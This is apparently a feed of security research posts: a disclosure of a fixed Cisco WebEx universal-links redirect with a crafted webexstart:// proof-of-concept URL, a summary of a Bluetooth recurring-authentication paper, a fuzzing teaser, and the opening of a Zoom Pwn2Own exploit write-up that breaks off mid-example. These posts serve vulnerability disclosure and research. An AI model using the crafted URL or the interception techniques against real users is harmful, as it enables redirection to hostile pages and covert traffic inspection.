
Cisco WebEx Universal Links Redirect

31 August 2021 at 15:56

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021–34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9\/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSW1OdmJXMXZiaUk2SUhzS0lDQWdJQ0FnSUNBaVJHVnNZWGxTWldScGNtVmpkQ0k2SUNKMGNuVmxJZ29nSUNBZ2ZTd0tJQ0FnSUNKM1pXSmxlQ0k2SUhzS0lDQWdJQ0FnSUNBaVNtOXBia1pwY25OMFFteGhZMnRNYVhOMElqb2dXd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJalF4TGpRaUxBb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lqUXhMalVpQ2lBZ0lDQWdJQ0FnWFFvZ0lDQWdmU3dLSUNBZ0lDSmxkbVZ1ZENJNklIc0tDaUFnSUNCOUxBb2odJQ0FnSW5SeVlXbHVhVzVuSWpvZ2V3b0tJQ0FnSUgwc0NpQWdJQ0FpYzNWd2NHOXlkQ0k2SUhzS0lDQWdJQ0FnSUNBaVIzQmpRMjl0Y0c5dVpXNTBUbUZ0WlNJNklDSkRhWE5qYnlCWFpXSmxlQ0JUZFhCd2IzSjBMbUZ3Y0NJS0lDQWdJSDBLZlFvPSIsInVsaW5rIjoiYUhSMGNITTZMeTl0WldWME1URXpMbmRsWW1WNExtTnZiUzkzWW5odGFuTXZhbTlwYm5ObGNuWnBZMlV2YzJsMFpYTXZiV1ZsZERFeE15OXRaV1YwYVc1bkwzTmxkSFZ3ZFc1cGRtVnljMkZzYkdsdWEzTS9jMmwwWlhWeWJEMXRaV1YwTVRFekptMWxaWFJwYm1kclpYazlNVGd5TWpnMk5qTTBOeVpqYjI1MFpYaDBTVVE5YzJWMGRYQjFibWwyWlhKellXeHNhVzVyWHpBek16azFZamN3WmpjMU1UUmpPR1U0TTJJek5qZ3lNV1V4T1dZd05UVXlYekUyTWpNNU5UQTBNVGMzTURZbWRHOXJaVzQ5VTBSS1ZGTjNRVUZCUVZoWVlqVkVMVTFtTUZKZlVXcHFka3BTWkdacmJFRmFZVzkxY1Voa1RYbHVjSFppWHpCS1IyeFJhVEYzTWlac1lXNW5kV0ZuWlQxbGJsOVZVdz09IiwidXRvZ2dsZSI6IjEiLCJtZSI6IjEiLCJqZnYiOiIxIiwidGlmIjoiUEQ5NGJXd2dkbVZ5YzJsdmJqMGlNUzR3SWlCbGJtTnZaR2x1WnowaVZWUkdMVGdpUHo0S1BGUmxiR1ZOWlhSeWVVbHVabTgrUEUxbGRISnBZM05GYm1GaWJHVStNVHd2VFdWMGNtbGpjMFZ1WVdKc1pUNDhUV1YwY21samMxVlNURDVvZEhSd2N6b3ZMM1J6WVRNdWQyVmlaWGd1WTI5dEwyMWxkSEpwWXk5Mk1Ud3ZUV1YwY21samMxVlNURDQ4VFdWMGNtbGpjMUJoY21GdFpYUmxjbk0rUEUxbGRISnBZM05VYVdOclpYUStVbnBJTHk5M1FVRkJRVmhqUkhCSlFTOVFja0ZWSzJGeWFXTnliVEF3TlRjMVpubFZUM0EwVFc4d1NrTnpWVXh0V2pKR1IyTkJQVDA4TDAxbGRISnBZM05VYVdOclpYUStQRU52Ym1aSlJENHhPVGN4T1RnME5UYzBNakkzTnpJek5EYzhMME52Ym1aSlJENDhVMmwwWlVsRVBqRTBNakkyTXpZeVBDOVRhWFJsU1VRK1BGUnBiV1ZUZEdGdGNENHhOakl6T0RZME1ERTNOekEzUEM5VWFXMWxVM1JoYlhBK1BFRlFVRTVoYldVK1UyVnpjMmx2Ymt0bGVUd3ZRVkJRVG1GdFpUNDhMMDFsZEhKcFkzTlFZWEpoYldWMFpYSnpQanhOWlhSeWFXTnpSVzVoWW14bFRXVmthV0ZSZFdGc2FYUjVSWFpsYm5RK01Ud3ZUV1YwY21samMwVnVZV0pzWlUxbFpHbGhVWFZoYkdsMGVVVjJaVzUwUGp3dlZHVnNaVTFsZEhKNVNXNW1iejQ9In0=

While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:

{"uuid":"8e18fa93cd10432a907c94fb9d3a63e6","cv":"41.6.4.8","cwsv":"11,41,0604,210608,0","st":"MC","pv":"T33_64UMC","cn":"ATCONFUI.BUNDLE","flag":33554432,"ejf":"2","cpp":"ewogICAgImNvbW1vbiI6IHsKICAgICAgICAiRGVsYXlSZWRpcmVjdCI6ICJ0cnVlIgogICAgfSwKICAgICJ3ZWJleCI6IHsKICAgICAgICAiSm9pbkZpcnN0QmxhY2tMaXN0IjogWwogICAgICAgICAgICAgICAgIjQxLjQiLAogICAgICAgICAgICAgICAgIjQxLjUiCiAgICAgICAgXQogICAgfSwKICAgICJldmVudCI6IHsKCiAgICB9LAogICAgInRyYWluaW5nIjogewoKICAgIH0sCiAgICAic3VwcG9ydCI6IHsKICAgICAgICAiR3BjQ29tcG9uZW50TmFtZSI6ICJDaXNjbyBXZWJleCBTdXBwb3J0LmFwcCIKICAgIH0KfQo=","ulink":"aHR0cHM6Ly9tZWV0MTEzLndlYmV4LmNvbS93YnhtanMvam9pbnNlcnZpY2Uvc2l0ZXMvbWVldDExMy9tZWV0aW5nL3NldHVwdW5pdmVyc2FsbGlua3M/c2l0ZXVybD1tZWV0MTEzJm1lZXRpbmdrZXk9MTgyMDIxMDYwOCZjb250ZXh0SUQ9c2V0dXB1bml2ZXJzYWxsaW5rXzNlNjNjZDFlODcyMzRlOTE4OWU2OWM2NjI2MDcxMzBiXzE2MjQwMjA4ODUwNTImdG9rZW49U0RKVFN3QUFBQVd4c0pGelhzSW1Da2l3aHQya2t4TE1WWFdJVFZpTTh4OWVnUWJlejVUaWhBMiZsYW5ndWFnZT1lbl9VUw==","utoggle":"1","me":"1","jfv":"1","tif":"PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPFRlbGVNZXRyeUluZm8+PE1ldHJpY3NFbmFibGU+MTwvTWV0cmljc0VuYWJsZT48TWV0cmljc1VSTD5odHRwczovL3RzYTMud2ViZXguY29tL21ldHJpYy92MTwvTWV0cmljc1VSTD48TWV0cmljc1BhcmFtZXRlcnM+PE1ldHJpY3NUaWNrZXQ+UnpILy93QUFBQVVoVE5VSXhKcThuKzR4N0djY2c5S1NFRWFqVHZ2aDQrWkxLSmIzTnh3aElnPT08L01ldHJpY3NUaWNrZXQ+PENvbmZJRD4xOTczMDMyMzQxNzY1MTQ3NDE8L0NvbmZJRD48U2l0ZUlEPjE0MjI2MzYyPC9TaXRlSUQ+PFRpbWVTdGFtcD4xNjIzOTM0NDg1MDUyPC9UaW1lU3RhbXA+PEFQUE5hbWU+U2Vzc2lvbktleTwvQVBQTmFtZT48L01ldHJpY3NQYXJhbWV0ZXJzPjxNZXRyaWNzRW5hYmxlTWVkaWFRdWFsaXR5RXZlbnQ+MTwvTWV0cmljc0VuYWJsZU1lZGlhUXVhbGl0eUV2ZW50PjwvVGVsZU1ldHJ5SW5mbz4=","}

From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

https://meet113.webex.com/wbxmjs/joinservice/sites/meet113/meeting/setupuniversallinks?siteurl=meet113&meetingkey=1820210608&contextID=setupuniversallink_3e63cd1e87234e9189e69c662607130b_1624020885052&token=SDJTSwAAAAWxsJFzXsImCkiwht2kkxLMVXWITViM8x9egQbez5TihA2&language=en_US

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “reddit.com” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.
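
To make the decoding chain concrete, here is a minimal Python sketch of it. The helper name and the stand-in payload are ours; a real 'p' value carries far more fields than shown:

import base64, json

def extract_ulink(p: str) -> str:
    """Decode the 'p' component of a webexstart:// URL and pull out 'ulink'."""
    settings = json.loads(base64.b64decode(p))           # the settings JSON shown above
    return base64.b64decode(settings["ulink"]).decode()  # 'ulink' is base64 again

# Round-trip demo with a stand-in payload:
demo = base64.b64encode(json.dumps(
    {"ulink": base64.b64encode(b"https://tenable.com").decode()}
).encode()).decode()
print(extract_ulink(demo))  # https://tenable.com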

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that an attacker could construct a fake WebEx meeting invite (whether through a malicious domain, or simply by getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to https://tenable.com:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSUNBZ0lDSmpiMjF0YjI0aU9pQjdDaUFnSUNBZ0lDQWdJa1JsYkdGNVVtVmthWEpsWTNRaU9pQWlabUZzYzJVaUNpQWdJQ0I5TEFvZ0lDQWdJbmRsWW1WNElqb2dld29nSUNBZ0lDQWdJQ0pLYjJsdVJtbHljM1JDYkdGamEweHBjM1FpT2lCYkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBaU5ERXVOQ0lzQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FpTkRFdU5TSUtJQ0FnSUNBZ0lDQmRDaUFnSUNCOUxBb2dJQ0FnSW1WMlpXNTBJam9nZXdvS0lDQWdJSDBzQ2lBZ0lDQWlkSEpoYVc1cGJtY2lPaUI3Q2dvZ0lDQWdmU3dLSUNBZ0lDSnpkWEJ3YjNKMElqb2dld29nSUNBZ0lDQWdJQ0pIY0dORGIyMXdiMjVsYm5ST1lXMWxJam9nSWtOcGMyTnZJRmRsWW1WNElGTjFjSEJ2Y25RdVlYQndJZ29nSUNBZ2ZRb2dJQ0FnZlFvZ0lDQWciLCJ1bGluayI6ImFIUjBjSE02THk5MFpXNWhZbXhsTG1OdmJRPT0iLCJ1dG9nZ2xlIjoiMSIsIm1lIjoiMSIsImpmdiI6IjEiLCJ0aWYiOiJQRDk0Yld3Z2RtVnljMmx2YmowaU1TNHdJaUJsYm1OdlpHbHVaejBpVlZSR0xUZ2lQejQ4VkdWc1pVMWxkSEo1U1c1bWJ6NDhUV1YwY21samMwVnVZV0pzWlQ0d1BDOU5aWFJ5YVdOelJXNWhZbXhsUGp4TlpYUnlhV056VlZKTVBtaDBkSEJ6T2k4dmRITmhNeTUzWldKbGVDNWpiMjB2YldWMGNtbGpMM1l4UEM5TlpYUnlhV056VlZKTVBqeE5aWFJ5YVdOelVHRnlZVzFsZEdWeWN6NDhUV1YwY21samMxUnBZMnRsZEQ1U2VrZ3ZMM2RCUVVGQldHTkVjRWxCTDFCeVFWVXJZWEpwWTNKdE1EQTFOelZtZVZWUGNEUk5iekJLUTNOVlRHMWFNa1pIWTBFOVBUd3ZUV1YwY21samMxUnBZMnRsZEQ0OFEyOXVaa2xFUGpFNU56RTVPRFExTnpReU1qYzNNak0wTnp3dlEyOXVaa2xFUGp4VGFYUmxTVVErTVRReU1qWXpOakk4TDFOcGRHVkpSRDQ4VkdsdFpWTjBZVzF3UGpFMk1qTTROalF3TVRjM01EYzhMMVJwYldWVGRHRnRjRDQ4UVZCUVRtRnRaVDVUWlhOemFXOXVTMlY1UEM5QlVGQk9ZVzFsUGp3dlRXVjBjbWxqYzFCaGNtRnRaWFJsY25NK1BFMWxkSEpwWTNORmJtRmliR1ZOWldScFlWRjFZV3hwZEhsRmRtVnVkRDR4UEM5TlpYUnlhV056Ulc1aFlteGxUV1ZrYVdGUmRXRnNhWFI1UlhabGJuUStQQzlVWld4bFRXVjBjbmxKYm1adlBnPT0ifQ==

The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to information disclosure.

Now, obviously, I want to emphasize that this flaw requires user interaction and is of relatively low impact. For starters, the attack requires an attacker to trick a user into visiting a malicious link (by providing a fake meeting invite via a custom domain, for example) and then allowing WebEx to launch from their browser. In other words, we already have an attacker getting someone to visit a possibly malicious link. In general, we wouldn’t report this sort of issue since no security boundary is being crossed; that’s too silly for even me to report. In this case, however, a security boundary is crossed in that we are able to force the victim to open a malicious link with a specific browser (Safari), which would allow an attacker to specially craft payloads for that target browser.

To clarify, this is a pretty lame but fun bug. While it’s tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they can craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)



Issues with Indefinite Trust in Bluetooth

25 August 2021 at 14:37

At IncludeSec we of course love to hack things, but we also love to use our skills and insights into security issues to explore innovative solutions, develop tools, and share resources. In this post we share a summary of a recent paper that I published with fellow researchers at the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec’21). WiSec is a conference well attended by people across industry, government, and academia; it is dedicated to all aspects of security and privacy in wireless and mobile networks and their applications, mobile software platforms, the Internet of Things, cyber-physical systems, usable security and privacy, biometrics, and cryptography.

Overview

Recurring Verification of Interaction Authenticity Within Bluetooth Networks
Travis Peters (Include Security), Timothy Pierson (Dartmouth College), Sougata Sen (BITS Pilani, K K Birla Goa Campus, India), José Camacho (University of Granada, Spain), and David Kotz (Dartmouth College)

The most common forms of authentication are passwords, potentially used in combination with a second factor such as a hardware token or mobile app (i.e., two-factor authentication). These approaches emphasize a one-time, initial authentication. After initial authentication, authenticated entities typically remain authenticated until an explicit deauthentication action is taken, or the authenticated session expires. Unfortunately, explicit deauthentication happens rarely, if ever. To address this issue, recent work has explored how to provide passive, continuous authentication and/or automatic de-authentication by correlating user movements and inputs with actions observed in an application (e.g., a web browser). 

The issue with indefinite trust, however, goes beyond user authentication. Consider devices that pair via Bluetooth, which commonly follow the pattern of pair once, trust indefinitely. After two devices connect, those devices are bonded until a user explicitly removes the bond. This bond is likely to remain intact for as long as the devices exist, or until they change ownership (e.g., are sold or lost).

The increased adoption of (Bluetooth-enabled) IoT devices and reports of the inadequacy of their security make indefinite trust of devices problematic. The reality of ubiquitous connectivity and frequent mobility gives rise to a myriad of opportunities for devices to be compromised. Thus, I put forth the argument with my academic research colleagues that one-time, single-factor, device-to-device authentication (i.e., an initial pairing) is not enough, and that there must exist some mechanism to frequently (re-)verify the authenticity of devices and their connections.

In our paper we propose a device-to-device recurring authentication scheme – Verification of Interaction Authenticity (VIA) – that is based on evaluating characteristics of the communications (interactions) between devices. We adapt techniques from wireless traffic analysis and intrusion detection systems to develop behavioral models that capture typical, authentic device interactions (behavior); these models enable recurring verification of device behavior.

Technical Highlights

  • Our recurring authentication scheme is based on off-the-shelf machine learning classifiers (e.g., Random Forest, k-NN) trained on characteristics extracted from Bluetooth/BLE network interactions (see the sketch after this list).
  • We extract model features from packet headers and payloads. Most of our analysis targets lower-level Bluetooth protocol layers, such as the HCI and L2CAP layers; higher-level BLE protocols, such as ATT, are also information-rich protocol layers. Hybrid models – combining information extracted from various protocol layers – are more complex, but may yield better results.
  • We construct verification models from a combination of fine-grained and coarse-grained features, including n-grams built from deep packet inspection, protocol identifiers and packet types, packet lengths, and packet directionality (ingress vs. egress). 
Our verification scheme can be deployed anywhere that interposes on Bluetooth communications between two devices. One example we consider is a deployment within a kernel module running on a mobile platform.
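
As a rough illustration of this modeling approach, here is a minimal sketch assuming scikit-learn. The feature extraction below (packet length, directionality, protocol identifier, and a small byte histogram standing in for n-grams) and the synthetic traffic are ours, not the paper’s exact pipeline:

from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import f1_score
from sklearn.model_selection import train_test_split

def featurize(packet: bytes, ingress: bool, proto_id: int) -> list:
    # Coarse-grained features: length, direction, protocol identifier,
    # plus a tiny byte histogram as a stand-in for deep-packet n-grams.
    hist = [0] * 16
    for b in packet[:64]:
        hist[b >> 4] += 1
    return [len(packet), int(ingress), proto_id] + hist

# Synthetic stand-in for captured HCI/L2CAP traffic; y = 1 marks authentic interactions.
X = [featurize(bytes([i % 251] * (20 + i % 40)), i % 2 == 0, i % 5) for i in range(200)]
y = [i % 2 for i in range(200)]

X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_tr, y_tr)
print("F1:", f1_score(y_te, clf.predict(X_te)))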

Other Highlights from the Paper 

  • We collected and presented a new, first-of-its-kind Bluetooth dataset. This dataset captures Bluetooth network traces corresponding to app-device interactions between more than 20 smart-health and smart-home devices. The dataset is open-source and available within the VM linked below.
  • We enhanced open-source Bluetooth analysis software – bluepy and btsnoop – in an effort to improve the available tools for practical exploration of the Bluetooth protocol and Bluetooth-based apps.
  • We presented a novel modeling technique, combined with off-the-shelf machine learning classifiers, for characterizing and verifying authentic Bluetooth/BLE app-device interactions.
  • We implemented our verification scheme and evaluated our approach against a test corpus of 20 smart-home and smart-health devices. Our results show that VIA can be used for verification with an F1-score of 0.86 or better in most test cases.

To learn more, check out our paper as well as a VM pre-loaded with our code and dataset.

Final Notes

Reproducible Research

We are advocates for research that is impactful and reproducible. At WiSec’21 our published work was featured as one of four papers this year that obtained the official replicability badges. These badges signify that our artifacts are available, have been evaluated for accuracy, and that our results were independently reproducible. We thank the ACM and the WiSec organizers for working to make sharing and reproducibility common practice in the publication process.

Next Steps

In future work we are interested in exploring a few directions:

  • Continue to enhance tooling that supports Bluetooth protocol analysis for research and security assessments
  • Expand our dataset to include more devices, adversarial examples, etc. 
  • Evaluate a real-world deployment (e.g., a smartphone-based multifactor authentication system for Bluetooth); such a deployment would enable us to evaluate practical issues such as verification latency, power consumption, and usability. 

Give us a shout if you are interested in our team doing Bluetooth hacks for your products!


Homemade Fuzzing Platform Recipe

By: voidsec
25 August 2021 at 13:11

It’s no secret that, since the beginning of the year, I’ve spent a good amount of time learning how to fuzz different Windows software, triaging crashes, filling CVE forms, writing harnesses and custom tools to aid in the process. Today I would like to sneak peek into my high-level process of designing a Homemade Fuzzing […]


Zoom RCE from Pwn2Own 2021

23 August 2021 at 00:00

On April 7, 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that the related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003), we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but also provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had extensive experience with exploiting memory corruption vulnerabilities on many platforms, neither of us had any experience with this on Windows, so during this project we had a lot to learn about Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we arrived at this solution.

Announcement

Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of security attention, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess as to what type of vulnerability we would expect to lead to RCE in each application: Microsoft Teams is developed using Electron, with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than on XSS.

Step 1: What is this “Zoom”?

Neither of us had used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all the ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full-featured chat client included, with the ability to send images, create group chats, and much more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as many of the features as possible.

Step 2: Network interception

The next step was to get visibility into the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses an XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one being a custom UDP-based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here; everything is passed to a callback in a different DLL.

In the next DLLs we hit a bit of a wall. The disassembly of the other DLLs was almost impossible to get through due to a large number of calls through vtables and into other DLLs. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLLs do no logging at all. Logs are of course useful for dynamic analysis, but they can be very useful for static analysis too, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while the application was running nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as the test units Tesla gives to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has an SDK that can be used to integrate the Zoom meeting functionality into other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI-related DLLs are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    logging::LogMessage::LogMessage
              (local_c8,
               "c:\\ZoomCode\\client_sdk_2019_kof\\client\\src\\framework\\common\\SaasBeeWebServiceModule\\ZoomNetworkMonitor.cpp"
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
    log_message(uVar3);
    logging::LogMessage::~LogMessage(local_c8);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well-known library is used for XMPP, and we would also need to get our payload through the server, so any invalid XML would not reach the other client. Many string operations use C++ std::string objects, which means that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.
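
To make the size mismatch explicit, here is a small Python illustration of the arithmetic: base64 output is at most 3/4 of the input, while the code above allocates four times the input size.

import base64

encoded = b"QUFBQQ=="                 # 8 input characters
decoded = base64.b64decode(encoded)   # b'AAAA': 4 bytes, at most 3/4 of the input

needed = (len(encoded) * 3) // 4      # 6: a correct upper bound for the output size
allocated = len(encoded) << 2         # 32: what the code above allocates instead
print(len(decoded), needed, allocated)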

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
